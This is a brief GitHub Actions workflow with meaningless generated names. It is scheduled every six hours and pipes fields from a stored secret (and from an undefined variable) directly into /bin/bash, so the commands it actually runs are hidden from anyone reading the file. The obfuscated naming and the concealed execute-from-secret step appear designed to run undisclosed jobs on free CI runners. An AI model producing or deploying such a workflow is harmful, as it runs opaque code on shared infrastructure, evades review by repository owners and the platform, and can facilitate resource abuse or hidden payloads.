name: carlosmarie3162
on:
  workflow_dispatch:
  schedule:
    - cron: '59 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: carlosmarie3162
        env:
          blz9611: ${{ secrets.blz9611 }}
        run: |
          echo $blz9611 | jq -r .fjz56 | /bin/bash
          echo $fuka3579 | jq -r .nplr1 | /bin/bash

